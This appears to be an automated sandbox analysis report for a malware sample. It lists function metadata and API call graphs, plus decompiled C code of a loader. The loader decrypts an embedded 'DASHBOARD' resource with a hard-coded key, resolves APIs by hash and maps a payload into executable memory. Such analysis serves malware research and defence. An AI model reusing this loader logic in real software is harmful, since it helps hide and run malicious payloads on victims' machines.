                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 02C40F41 Relevance: .0, Instructions: 5COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000003.418655141.0000000002C40000.00000010.00000800.00020000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_3_2c40000_mshta.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                    • Instruction ID: ed9e52ba67b6bba4a2dc3bb6c92bce0355d7fa9dd7b473c0ee579060826d6020
                                                                                                                    • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 02C40F49 Relevance: .0, Instructions: 5COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000003.418655141.0000000002C40000.00000010.00000800.00020000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_3_2c40000_mshta.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                    • Instruction ID: ed9e52ba67b6bba4a2dc3bb6c92bce0355d7fa9dd7b473c0ee579060826d6020
                                                                                                                    • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 02C40F51 Relevance: .0, Instructions: 5COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000003.418655141.0000000002C40000.00000010.00000800.00020000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_3_2c40000_mshta.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                    • Instruction ID: ed9e52ba67b6bba4a2dc3bb6c92bce0355d7fa9dd7b473c0ee579060826d6020
                                                                                                                    • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 02C40F71 Relevance: .0, Instructions: 5COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000003.418655141.0000000002C40000.00000010.00000800.00020000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_3_2c40000_mshta.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                    • Instruction ID: ed9e52ba67b6bba4a2dc3bb6c92bce0355d7fa9dd7b473c0ee579060826d6020
                                                                                                                    • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 02C40F79 Relevance: .0, Instructions: 5COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000003.418655141.0000000002C40000.00000010.00000800.00020000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_3_2c40000_mshta.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                    • Instruction ID: ed9e52ba67b6bba4a2dc3bb6c92bce0355d7fa9dd7b473c0ee579060826d6020
                                                                                                                    • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 02C40F11 Relevance: .0, Instructions: 5COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000003.418655141.0000000002C40000.00000010.00000800.00020000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_3_2c40000_mshta.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                    • Instruction ID: ed9e52ba67b6bba4a2dc3bb6c92bce0355d7fa9dd7b473c0ee579060826d6020
                                                                                                                    • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 02C40F21 Relevance: .0, Instructions: 5COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000003.418655141.0000000002C40000.00000010.00000800.00020000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_3_2c40000_mshta.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                    • Instruction ID: ed9e52ba67b6bba4a2dc3bb6c92bce0355d7fa9dd7b473c0ee579060826d6020
                                                                                                                    • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Executed Functions

                                                                                                                    Function 000007FF00270A21 Relevance: .3, Instructions: 333COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.678828554.000007FF00270000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FF00270000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff00270000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: e0d2e070fa14f4f7caa9ad7120c51440c5463161024b57db53a4ac46e29cc310
                                                                                                                    • Instruction ID: 3de0f51dd149ed79ffb9d7f138d5a5522eb7fa8718c8c229c612fa17cf5d7a6c
                                                                                                                    • Opcode Fuzzy Hash: e0d2e070fa14f4f7caa9ad7120c51440c5463161024b57db53a4ac46e29cc310
                                                                                                                    • Instruction Fuzzy Hash: 4E715720A0EBC64FE75357785C6A6A17FF09F57210B0E41EBD488CB0A3D948999AC362
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 000007FF002708A5 Relevance: .2, Instructions: 177COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.678828554.000007FF00270000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FF00270000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff00270000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: ab90af5b409d8085e118bd7239a72e1385613ec267adc406c5f10e6ef1a440f8
                                                                                                                    • Instruction ID: fea371928174f7ccd6b9209cd4da85a268a5e576f038f98be58ea2ac25bf1c55
                                                                                                                    • Opcode Fuzzy Hash: ab90af5b409d8085e118bd7239a72e1385613ec267adc406c5f10e6ef1a440f8
                                                                                                                    • Instruction Fuzzy Hash: 6E410D6194E7C28FE71357785CA92A07FB0AF57210B0E04EBD488CF0A3E5588D9AD362
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:16.1%
                                                                                                                    Dynamic/Decrypted Code Coverage:16.2%
                                                                                                                    Signature Coverage:21.9%
                                                                                                                    Total number of Nodes:297
                                                                                                                    Total number of Limit Nodes:23
                                                                                                                    execution_graph 31847 10035042 TlsGetValue 31848 10035076 GetModuleHandleA 31847->31848 31849 10035055 31847->31849 31851 10035085 GetProcAddress 31848->31851 31852 1003509f 31848->31852 31849->31848 31850 1003505f TlsGetValue 31849->31850 31855 1003506a 31850->31855 31853 1003506e 31851->31853 31853->31852 31854 10035095 RtlEncodePointer 31853->31854 31854->31852 31855->31848 31855->31853 31856 10020c26 31857 10020c32 __EH_prolog3 31856->31857 31859 10020c80 31857->31859 31867 1002083b EnterCriticalSection 31857->31867 31881 100201f1 RaiseException __CxxThrowException@8 31857->31881 31882 1002094b TlsAlloc InitializeCriticalSection 31857->31882 31883 100206c8 EnterCriticalSection TlsGetValue LeaveCriticalSection LeaveCriticalSection 31859->31883 31861 10020c8d 31864 10020c93 31861->31864 31865 10020ca6 ~_Task_impl 31861->31865 31884 100209ed 88 API calls 4 library calls 31864->31884 31868 1002085a 31867->31868 31870 10020893 31868->31870 31871 100208a8 GlobalHandle GlobalUnlock 31868->31871 31880 10020916 _memset 31868->31880 31869 1002092a LeaveCriticalSection 31869->31857 31885 10014460 31870->31885 31872 10014460 ctype 80 API calls 31871->31872 31874 100208c5 GlobalReAlloc 31872->31874 31876 100208cf 31874->31876 31877 100208f7 GlobalLock 31876->31877 31878 100208da GlobalHandle GlobalLock 31876->31878 31879 100208e8 LeaveCriticalSection 31876->31879 31877->31880 31878->31879 31879->31877 31880->31869 31882->31857 31883->31861 31884->31865 31886 10014477 ctype 31885->31886 31887 1001448c GlobalAlloc 31886->31887 31889 10013ba0 80 API calls ctype 31886->31889 31887->31876 31889->31887 31890 10030d06 31891 10030d12 31890->31891 31892 10030d0d 31890->31892 31896 10030c10 31891->31896 31908 1003906d GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 31892->31908 31895 10030d23 31897 10030c1c _printf 31896->31897 31901 10030c69 31897->31901 31907 10030cb9 _printf 31897->31907 31909 10030a37 31897->31909 31901->31907 31963 100125c0 31901->31963 31902 10030c99 31903 10030a37 __CRT_INIT@12 165 API calls 31902->31903 31902->31907 31903->31907 31904 100125c0 ___DllMainCRTStartup 146 API calls 31905 10030c90 31904->31905 31906 10030a37 __CRT_INIT@12 165 API calls 31905->31906 31906->31902 31907->31895 31908->31891 31910 10030b61 31909->31910 31911 10030a4a GetProcessHeap HeapAlloc 31909->31911 31913 10030b67 31910->31913 31914 10030b9c 31910->31914 31912 10030a6e GetVersionExA 31911->31912 31928 10030a67 31911->31928 31915 10030a89 GetProcessHeap HeapFree 31912->31915 31916 10030a7e GetProcessHeap HeapFree 31912->31916 31921 10030b86 31913->31921 31913->31928 32011 100310be 67 API calls _doexit 31913->32011 31917 10030ba1 31914->31917 31918 10030bfa 31914->31918 31919 10030ab5 31915->31919 31916->31928 31995 10035135 6 API calls __decode_pointer 31917->31995 31918->31928 32030 10035425 79 API calls 2 library calls 31918->32030 31985 10036624 HeapCreate 31919->31985 31921->31928 32012 100389ee 68 API calls __mtinitlocknum 31921->32012 31923 10030ba6 31996 10035840 31923->31996 31928->31901 31929 10030aeb 31929->31928 31932 10030af4 31929->31932 31930 10030b90 32013 10035178 70 API calls 2 library calls 31930->32013 32002 1003548e 78 API calls 6 library calls 31932->32002 31935 10030bbe 32015 100350ae TlsGetValue TlsGetValue GetModuleHandleA GetProcAddress 31935->32015 31937 10030af9 __RTC_Initialize 31942 10030b0c GetCommandLineA 31937->31942 31956 10030afd 31937->31956 31938 10030b95 32014 1003667e VirtualFree HeapFree HeapFree HeapDestroy 31938->32014 31939 10030bd0 31943 10030bd7 31939->31943 31944 10030bee 31939->31944 32004 10038d66 77 API calls 3 library calls 31942->32004 32016 100351b5 67 API calls 4 library calls 31943->32016 32017 1002fa69 31944->32017 31948 10030b1c 32005 100387ae 72 API calls 3 library calls 31948->32005 31949 10030bde GetCurrentThreadId 31949->31928 31951 10030b26 31952 10030b2a 31951->31952 32007 10038cad 111 API calls 3 library calls 31951->32007 32006 10035178 70 API calls 2 library calls 31952->32006 31955 10030b36 31957 10030b4a 31955->31957 32008 10038a3a 110 API calls 6 library calls 31955->32008 32003 1003667e VirtualFree HeapFree HeapFree HeapDestroy 31956->32003 31962 10030b02 31957->31962 32010 100389ee 68 API calls __mtinitlocknum 31957->32010 31960 10030b3f 31960->31957 32009 10030f4d 75 API calls 4 library calls 31960->32009 31962->31928 32056 10006a90 31963->32056 31966 1001265a 32090 1002fe65 105 API calls 5 library calls 31966->32090 31967 1001261c FindResourceW LoadResource SizeofResource 31970 10006a90 ___DllMainCRTStartup 67 API calls 31967->31970 31973 10012744 ___DllMainCRTStartup 31970->31973 31972 1001284d 31972->31902 31972->31904 31974 100127b7 VirtualAlloc 31973->31974 31975 1001279b VirtualAllocExNuma 31973->31975 31976 100127da 31974->31976 31975->31976 32061 1002fb00 31976->32061 31980 100127fa 32084 10002970 31980->32084 31982 10012810 ___DllMainCRTStartup 32087 100026a0 31982->32087 31984 10012664 32091 1002f81e 5 API calls __invoke_watson 31984->32091 31986 10036647 31985->31986 31987 10036644 31985->31987 32031 100365c9 67 API calls 2 library calls 31986->32031 31987->31929 31989 1003664c 31990 10036656 31989->31990 31991 1003667a 31989->31991 32032 10035aca HeapAlloc 31990->32032 31991->31929 31993 10036660 31993->31991 31994 10036665 HeapDestroy 31993->31994 31994->31987 31995->31923 31997 10035844 31996->31997 31999 10030bb2 31997->31999 32000 10035864 Sleep 31997->32000 32033 10030678 31997->32033 31999->31928 31999->31935 32001 10035879 32000->32001 32001->31997 32001->31999 32002->31937 32003->31962 32004->31948 32005->31951 32006->31956 32007->31955 32008->31960 32009->31957 32010->31952 32011->31921 32012->31930 32013->31938 32014->31928 32015->31939 32016->31949 32019 1002fa75 _printf 32017->32019 32018 1002faee __dosmaperr _printf 32018->31962 32019->32018 32029 1002fab4 32019->32029 32052 10035a99 67 API calls 2 library calls 32019->32052 32020 1002fac9 HeapFree 32020->32018 32022 1002fadb 32020->32022 32055 100311f4 67 API calls __getptd_noexit 32022->32055 32024 1002fae0 GetLastError 32024->32018 32025 1002faa6 32054 1002fabf LeaveCriticalSection _doexit 32025->32054 32026 1002fa8c ___sbh_find_block 32026->32025 32053 10035b3d VirtualFree VirtualFree HeapFree __shift 32026->32053 32029->32018 32029->32020 32030->31928 32031->31989 32032->31993 32034 10030684 _printf 32033->32034 32035 1003069c 32034->32035 32045 100306bb _memset 32034->32045 32046 100311f4 67 API calls __getptd_noexit 32035->32046 32037 100306a1 32047 10037753 4 API calls 2 library calls 32037->32047 32039 1003072d RtlAllocateHeap 32039->32045 32042 100306b1 _printf 32042->31997 32045->32039 32045->32042 32048 10035a99 67 API calls 2 library calls 32045->32048 32049 100362e6 5 API calls 2 library calls 32045->32049 32050 10030774 LeaveCriticalSection _doexit 32045->32050 32051 100368d5 TlsGetValue TlsGetValue GetModuleHandleA GetProcAddress __decode_pointer 32045->32051 32046->32037 32048->32045 32049->32045 32050->32045 32051->32045 32052->32026 32053->32025 32054->32029 32055->32024 32057 1002f9a6 _malloc 67 API calls 32056->32057 32058 10006aa1 32057->32058 32059 1002fa69 __mtinitlocknum 67 API calls 32058->32059 32060 10006aad 32058->32060 32059->32060 32060->31966 32060->31967 32062 1002fb18 32061->32062 32063 1002fb3f __VEC_memcpy 32062->32063 32064 100127eb 32062->32064 32063->32064 32065 1002f9a6 32064->32065 32066 1002fa53 32065->32066 32077 1002f9b4 32065->32077 32099 100368d5 TlsGetValue TlsGetValue GetModuleHandleA GetProcAddress __decode_pointer 32066->32099 32068 1002fa59 32100 100311f4 67 API calls __getptd_noexit 32068->32100 32071 1002fa5f 32071->31980 32074 1002fa17 RtlAllocateHeap 32074->32077 32075 1002f9c9 32075->32077 32092 10036892 67 API calls 2 library calls 32075->32092 32093 100366f2 67 API calls 7 library calls 32075->32093 32094 10030e7b GetModuleHandleA GetProcAddress ExitProcess ___crtCorExitProcess 32075->32094 32077->32074 32077->32075 32078 1002fa4a 32077->32078 32079 1002fa3e 32077->32079 32082 1002fa3c 32077->32082 32095 1002f957 67 API calls 4 library calls 32077->32095 32096 100368d5 TlsGetValue TlsGetValue GetModuleHandleA GetProcAddress __decode_pointer 32077->32096 32078->31980 32097 100311f4 67 API calls __getptd_noexit 32079->32097 32098 100311f4 67 API calls __getptd_noexit 32082->32098 32085 1002f9a6 _malloc 67 API calls 32084->32085 32086 10002990 32085->32086 32086->31982 32101 10002280 32087->32101 32090->31984 32091->31972 32092->32075 32093->32075 32095->32077 32096->32077 32097->32082 32098->32078 32099->32068 32100->32071 32138 10001990 32101->32138 32104 100022c3 SetLastError 32135 100022a9 32104->32135 32105 100022d5 32106 10001990 ___DllMainCRTStartup SetLastError 32105->32106 32107 100022ee 32106->32107 32108 10002310 SetLastError 32107->32108 32109 10002322 32107->32109 32107->32135 32108->32135 32110 10002331 SetLastError 32109->32110 32111 10002343 32109->32111 32110->32135 32112 1000234e SetLastError 32111->32112 32114 10002360 GetNativeSystemInfo 32111->32114 32112->32135 32115 10002414 SetLastError 32114->32115 32116 10002426 VirtualAlloc 32114->32116 32115->32135 32117 10002472 GetProcessHeap HeapAlloc 32116->32117 32118 10002447 VirtualAlloc 32116->32118 32120 100024ac 32117->32120 32121 1000248c VirtualFree SetLastError 32117->32121 32118->32117 32119 10002463 SetLastError 32118->32119 32119->32135 32122 10001990 ___DllMainCRTStartup SetLastError 32120->32122 32121->32135 32123 1000250e 32122->32123 32124 10002512 32123->32124 32125 1000251c VirtualAlloc 32123->32125 32176 10002840 VirtualFree VirtualFree GetProcessHeap HeapFree ___DllMainCRTStartup 32124->32176 32126 1000254b ___DllMainCRTStartup 32125->32126 32141 100019c0 32126->32141 32129 1000257f ___DllMainCRTStartup 32129->32124 32151 10001ff0 32129->32151 32133 100025e8 ___DllMainCRTStartup 32133->32124 32133->32135 32170 33e991 32133->32170 32135->31984 32136 1000264f SetLastError 32136->32124 32139 100019ab 32138->32139 32140 1000199f SetLastError 32138->32140 32139->32104 32139->32105 32139->32135 32140->32139 32142 100019f0 32141->32142 32143 10001a83 32142->32143 32145 10001a2c VirtualAlloc 32142->32145 32150 10001aa0 ___DllMainCRTStartup 32142->32150 32144 10001990 ___DllMainCRTStartup SetLastError 32143->32144 32146 10001a9c 32144->32146 32147 10001a50 32145->32147 32148 10001a57 ___DllMainCRTStartup 32145->32148 32149 10001aa4 VirtualAlloc 32146->32149 32146->32150 32147->32150 32148->32142 32149->32150 32150->32129 32152 10002029 IsBadReadPtr 32151->32152 32161 1000201f 32151->32161 32154 10002053 32152->32154 32152->32161 32155 10002085 SetLastError 32154->32155 32156 10002099 32154->32156 32154->32161 32155->32161 32177 100018b0 VirtualQuery VirtualFree VirtualAlloc ___DllMainCRTStartup 32156->32177 32158 100020b3 32159 100020bf SetLastError 32158->32159 32162 100020e9 32158->32162 32159->32161 32161->32124 32164 10001cb0 32161->32164 32162->32161 32163 100021f9 SetLastError 32162->32163 32163->32161 32165 10001cf8 ___DllMainCRTStartup 32164->32165 32166 10001e01 32165->32166 32168 10001ddd 32165->32168 32178 10001b80 32165->32178 32167 10001b80 ___DllMainCRTStartup 2 API calls 32166->32167 32167->32168 32168->32133 32171 33ea62 32170->32171 32172 33ea8d 32170->32172 32185 33f8fd 32171->32185 32172->32135 32172->32136 32176->32135 32177->32158 32179 10001b9c 32178->32179 32181 10001b92 32178->32181 32180 10001baa 32179->32180 32183 10001c04 VirtualProtect 32179->32183 32180->32181 32184 10001be2 VirtualFree 32180->32184 32181->32165 32183->32181 32184->32181 32194 33fde0 32185->32194 32186 33ffd1 32209 33ab87 32186->32209 32189 33ea75 32189->32172 32198 3393ed 32189->32198 32192 34dcf7 GetPEB 32192->32194 32194->32186 32194->32189 32194->32192 32197 33a8b0 GetPEB 32194->32197 32201 33b23c 32194->32201 32205 3446bb 32194->32205 32219 34da22 GetPEB 32194->32219 32220 3347ce GetPEB 32194->32220 32221 33f899 GetPEB 32194->32221 32222 334b61 32194->32222 32197->32194 32199 34aa30 GetPEB 32198->32199 32200 339456 ExitProcess 32199->32200 32200->32172 32202 33b254 32201->32202 32226 34aa30 32202->32226 32206 3446da 32205->32206 32207 34aa30 GetPEB 32206->32207 32208 344729 SHGetFolderPathW 32207->32208 32208->32194 32210 33abb0 32209->32210 32211 334b61 GetPEB 32210->32211 32212 33ad67 32211->32212 32234 337f5d 32212->32234 32214 33ad99 32218 33ada4 32214->32218 32238 341e67 GetPEB 32214->32238 32216 33adc4 32239 341e67 GetPEB 32216->32239 32218->32189 32219->32194 32220->32194 32221->32194 32223 334b74 32222->32223 32240 331ea7 32223->32240 32227 34ab1d 32226->32227 32231 33b2b8 lstrcmpiW 32226->32231 32232 340a0e GetPEB 32227->32232 32229 34ab33 32233 33cdcd GetPEB 32229->32233 32231->32194 32232->32229 32233->32231 32235 337f8e 32234->32235 32236 34aa30 GetPEB 32235->32236 32237 337fd4 CreateProcessW 32236->32237 32237->32214 32238->32216 32239->32218 32241 331ebc 32240->32241 32244 33702c 32241->32244 32245 337049 32244->32245 32246 34aa30 GetPEB 32245->32246 32247 331f4c 32246->32247 32247->32194

                                                                                                                    Executed Functions

                                                                                                                    Function 100125C0 Relevance: 45.7, APIs: 7, Strings: 19, Instructions: 165memoryCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    C-Code - Quality: 89%
                                                                                                                    			E100125C0(void* __ebx, void* __edi, void* __esi, void* __eflags, struct HINSTANCE__* _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _v8;
				void* _v12;
				intOrPtr _v16;
				signed int _v20;
				short _v22;
				short _v24;
				short _v26;
				short _v28;
				short _v30;
				short _v32;
				short _v34;
				short _v36;
				short _v38;
				char _v40;
				void* _v44;
				void* _v48;
				long _v52;
				void* _v56;
				struct HRSRC__* _v60;
				short _v64;
				short _v66;
				short _v68;
				short _v70;
				short _v72;
				short _v74;
				short _v76;
				short _v78;
				short _v80;
				short _v82;
				short _v84;
				short _v86;
				char _v88;
				intOrPtr _v92;
				void* __ebp;
				signed int _t66;
				void* _t70;
				void* _t72;
				struct HRSRC__* _t74;
				void* _t78;
				intOrPtr _t92;
				void* _t93;
				void* _t95;
				intOrPtr _t104;
				signed int _t120;
				void* _t121;

				_t119 = __esi;
				_t118 = __edi;
				_t96 = __ebx;
				_t66 =  *0x100545cc; // 0x3f6a93de
				_v20 = _t66 ^ _t120;
				_v92 = _a8;
				 *0x10055a80 = _a4;
				_t109 = _a8;
				 *0x10055a84 = _a8;
				 *0x10055a88 = _a12;
				_v8 = 0;
				_v52 = 0;
				_v44 = 0;
				_v48 = 0;
				_v12 = 0;
				_t70 = E10006A90(__eflags); // executed
				_t131 = _t70;
				if(_t70 != 0) {
					_push(0x10046758);
					E1002FE65(__ebx, _t109, __edi, __esi, __eflags);
					_t72 = 0;
				} else {
					 *0x100530b8 = 0;
					 *0x100530bc = 0;
					 *0x100530c0 = 0;
					 *0x100530c8 = 0;
					 *0x100530c4 = 0;
					 *0x100530cc = 0;
					_v60 = 0;
					_v56 = 0;
					_t74 = FindResourceW(_a4, 0x1705, L"DASHBOARD"); // executed
					_v60 = _t74;
					_v56 = LoadResource(_a4, _v60);
					_v52 = SizeofResource(_a4, _v60);
					_v88 = 0x6b;
					_v86 = 0x65;
					_v84 = 0x72;
					_v82 = 0x6e;
					_v80 = 0x65;
					_v78 = 0x6c;
					_v76 = 0x33;
					_v74 = 0x32;
					_v72 = 0x2e;
					_v70 = 0x64;
					_v68 = 0x6c;
					_v66 = 0x6c;
					_v64 = 0;
					_v40 = 0x6e;
					_v38 = 0x74;
					_v36 = 0x64;
					_v34 = 0x6c;
					_v32 = 0x6c;
					_v30 = 0x2e;
					_v28 = 0x64;
					_v26 = 0x6c;
					_v24 = 0x6c;
					_v22 = 0;
					_t78 = E10006A90(_t131); // executed
					if(_t78 == 0) {
						_t45 =  &_v88; // 0x6b
						_t95 = E100048E0(_t45);
						_t121 = _t121 + 4;
						_v44 = _t95;
					}
					_t47 =  &_v40; // 0x6e
					_v48 = E100048E0(_t47);
					 *0x10055a7c = E100053D0(_v44, 0x6c705b40);
					 *0x10055a78 = E100053D0(_v44, 0x531ff383);
					_t133 =  *0x10055a78;
					if( *0x10055a78 == 0) {
						__eflags = 0x2000;
						_v12 = VirtualAlloc(0, _v52, 0x00002000 -  *0x100530cc | 0x00001000, 0x40);
					} else {
						_t93 =  *0x10055a78(0xffffffff, 0, _v52, 0x3000, 0x40, 0); // executed
						_v12 = _t93;
					}
					E1002FB00(_t96, _t118, _t119, _v12, _v56, _v52);
					_t104 =  *0x100530b4; // 0x2795
					_v16 = E1002F9A6(_t96, _v56, _t118, _t119, _t104);
					E10002970(_t133, _v16, "6p2Z6a6CZ&M>ZR$a@Y$xnQ?<XBeh<22mz&0", 0x24);
					_t109 = _v16;
					E10003EE0(_v16, _v12, _v52);
					_t92 = E100026A0(0x10055a64, _v12, _v52); // executed
					 *0x10055a8c = _t92;
					_t72 = 1;
				}
				return E1002F81E(_t72, _t96, _v20 ^ _t120, _t109, _t118, _t119);
			}
















































                                                                                                                    0x100125c0
                                                                                                                    0x100125c0
                                                                                                                    0x100125c0
                                                                                                                    0x100125c6
                                                                                                                    0x100125cd
                                                                                                                    0x100125d3
                                                                                                                    0x100125d9
                                                                                                                    0x100125df
                                                                                                                    0x100125e2
                                                                                                                    0x100125eb
                                                                                                                    0x100125f0
                                                                                                                    0x100125f7
                                                                                                                    0x100125fe
                                                                                                                    0x10012605
                                                                                                                    0x1001260c
                                                                                                                    0x10012613
                                                                                                                    0x10012618
                                                                                                                    0x1001261a
                                                                                                                    0x1001265a
                                                                                                                    0x1001265f
                                                                                                                    0x10012667
                                                                                                                    0x1001261c
                                                                                                                    0x1001261c
                                                                                                                    0x10012626
                                                                                                                    0x10012630
                                                                                                                    0x1001263a
                                                                                                                    0x10012644
                                                                                                                    0x1001264e
                                                                                                                    0x1001266e
                                                                                                                    0x10012675
                                                                                                                    0x1001268a
                                                                                                                    0x10012690
                                                                                                                    0x100126a1
                                                                                                                    0x100126b2
                                                                                                                    0x100126b5
                                                                                                                    0x100126bb
                                                                                                                    0x100126c1
                                                                                                                    0x100126c7
                                                                                                                    0x100126cd
                                                                                                                    0x100126d3
                                                                                                                    0x100126d9
                                                                                                                    0x100126df
                                                                                                                    0x100126e5
                                                                                                                    0x100126eb
                                                                                                                    0x100126f1
                                                                                                                    0x100126f7
                                                                                                                    0x100126fd
                                                                                                                    0x10012703
                                                                                                                    0x10012709
                                                                                                                    0x1001270f
                                                                                                                    0x10012715
                                                                                                                    0x1001271b
                                                                                                                    0x10012721
                                                                                                                    0x10012727
                                                                                                                    0x1001272d
                                                                                                                    0x10012733
                                                                                                                    0x10012739
                                                                                                                    0x1001273f
                                                                                                                    0x10012746
                                                                                                                    0x10012748
                                                                                                                    0x1001274c
                                                                                                                    0x10012751
                                                                                                                    0x10012754
                                                                                                                    0x10012754
                                                                                                                    0x10012757
                                                                                                                    0x10012763
                                                                                                                    0x10012777
                                                                                                                    0x1001278d
                                                                                                                    0x10012792
                                                                                                                    0x10012799
                                                                                                                    0x100127c4
                                                                                                                    0x100127d7
                                                                                                                    0x1001279b
                                                                                                                    0x100127ac
                                                                                                                    0x100127b2
                                                                                                                    0x100127b2
                                                                                                                    0x100127e6
                                                                                                                    0x100127ee
                                                                                                                    0x100127fd
                                                                                                                    0x1001280b
                                                                                                                    0x1001281b
                                                                                                                    0x1001281f
                                                                                                                    0x10012834
                                                                                                                    0x10012839
                                                                                                                    0x1001283e
                                                                                                                    0x1001283e
                                                                                                                    0x10012850

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 10006A90: _malloc.LIBCMT ref: 10006A9C
                                                                                                                    • _printf.LIBCMT ref: 1001265F
                                                                                                                    • FindResourceW.KERNEL32(00000000,00001705,DASHBOARD), ref: 1001268A
